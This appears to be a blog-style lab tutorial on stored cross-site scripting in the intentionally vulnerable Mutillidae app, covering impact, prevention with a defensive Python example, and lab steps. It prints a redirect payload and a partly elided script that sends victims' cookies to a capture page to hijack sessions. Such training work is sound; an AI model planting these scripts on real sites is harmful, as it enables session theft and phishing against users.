Lesson 2: Stored XSS (Cross-Site Scripting) Page Redirection

Stored XSS occurs when a malicious script is persistently stored on the web server (for example in a database record or a comment field) and later executed in the browser of every user who views the affected content. In a page-redirection attack, the injected script automatically sends the user to a malicious or phishing site without their consent.

Impact:

  • Users are silently redirected to harmful sites.

  • Can lead to phishing, malware downloads, or credential theft.

  • Damages user trust and site reputation.

Prevention:

  • Properly sanitize and encode all user input/output.

  • Use Content Security Policy (CSP).

  • Employ security libraries or frameworks that guard against XSS.
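As an added illustration of the three defences listed above (example code written for this page, not part of the original lesson or of Mutillidae): the two payloads used in the lab steps are stored verbatim, then rendered once the vulnerable way and once HTML-encoded, alongside a CSP header and a session cookie issued with HttpOnly. The cookie name PHPSESSID and the CSP value are assumptions.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample data: the two blog entries the lab stores in Mutillidae.
STORED_ENTRIES = [
    '<script>window.location = "http://www.offensive-security.com/"</script>',
    '<script>var lData = "data=" + encodeURIComponent(document.cookie);</script>',
]

def render_unsafe(entry: str) -> str:
    """Vulnerable pattern: the stored entry is echoed into the page verbatim,
    so any <script> inside it runs in every viewer's browser."""
    return f"<div class='blog-entry'>{entry}</div>"

def render_safe(entry: str) -> str:
    """Fix 1 (output encoding): HTML-encode the entry at the point it is placed
    into HTML, turning < > & " ' into entities so the browser shows inert text."""
    return f"<div class='blog-entry'>{html.escape(entry, quote=True)}</div>"

def has_script_tag(fragment: str) -> bool:
    """Crude check used here only to show the difference between the two renderers."""
    return "<script" in fragment.lower()

# Fix 2 (CSP): a policy without 'unsafe-inline' refuses inline scripts, so an
# injected <script> block that slips through is not executed. Assumed value.
CSP_HEADER = ("Content-Security-Policy",
              "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'")

def session_cookie(token: str, name: str = "PHPSESSID") -> str:
    """Fix 3 (cookie flags): issue the session cookie with HttpOnly so that
    document.cookie, which the capture script reads, cannot see it. The cookie
    name defaults to PHP's usual one and is an assumption, not read from Mutillidae."""
    jar = SimpleCookie()
    jar[name] = token
    jar[name]["httponly"] = True
    jar[name]["secure"] = True
    jar[name]["samesite"] = "Lax"
    return jar.output(header="").strip()

if __name__ == "__main__":
    for entry in STORED_ENTRIES:
        print("unsafe :", render_unsafe(entry))
        print("safe   :", render_safe(entry))
    print("%s: %s" % CSP_HEADER)
    print("Set-Cookie:", session_cookie("constructed-session-token"))
```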

Now, let’s try to implement an XSS example for fun. 🍼

On your Kali Linux VM, open Mutillidae and reset the database.

  1. Navigate through the menu:
    OWASP 2017 → A7 — Cross Site Scripting (XSS) → Persistent → Add to Your Blog.

  2. In the Add to Your Blog page, enter the following script:

<script>window.location = "http://www.offensive-security.com/"</script>

On your Windows 10 VM

▪ Open Firefox and go to the main Mutillidae page. Then go to the Add to your blog page.

▪ You will notice that the page is redirected to http://www.offensive-security.com.

Grabbing Session Tokens with Stored XSS

On your Kali Linux VM

▪ Navigate to the Mutillidae Login/Register page in Firefox.

▪ Create a user with the name “hacker” and log in as that user.

▪ Paste the following script into the Add to Your Blog page (as the hacker user). If you still get redirected because of the previous test, click on Reset DB again first.

<script>
   var lXMLHTTP;
   try {
      // document.cookie only exposes cookies that were set without the HttpOnly flag
      var lData = "data=" + encodeURIComponent(document.cookie);
      var lHost = "gliyanage187787-uws";
      var lProtocol = "http";
      var lFilePath = "/mutillidae/capture-data.php";

      //---(The middle portion of the script has been taken out to save space)---

      lXMLHTTP.setRequestHeader("Host", lHost);
      lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
      lXMLHTTP.send(lData);
   } catch(e) {
   }
</script>

▪ Click on Save Blog Entry.

If you want to refer to more Mutillidae test scripts:

▪ Click on Installation Instructions: Windows 7 (PDF) listed under the Documentation menu on the left. You may be prompted to save the file. Do not save it; we are only interested in where this file is located on the server.

▪ Delete everything after …documentation/ in the URL and hit Enter.

▪ From the index page you have just found, open the Mutillidae-Test-Scripts.txt file.

On your Windows 10 VM

▪ Create a new user named “gliyanage”, then log in as that user.

▪ Navigate to the View Someone’s Blog Page and choose to show all blog entries.

On your Kali Linux VM

▪ Navigate to the View Captured Data Page to see the information that was logged in the background.

Now you can see that the session tokens of user ‘gliyanage’ have been captured by the hacker user.

Written by

Gihan Shamike Liyanage